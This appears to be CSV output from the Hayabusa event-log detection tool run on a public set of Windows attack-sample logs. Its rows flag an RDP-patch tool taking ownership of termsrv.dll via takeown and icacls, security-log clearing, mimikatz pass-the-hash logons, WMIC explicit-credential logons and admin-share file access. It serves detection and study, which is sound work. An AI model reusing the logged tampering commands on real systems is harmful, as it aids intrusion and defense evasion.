Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 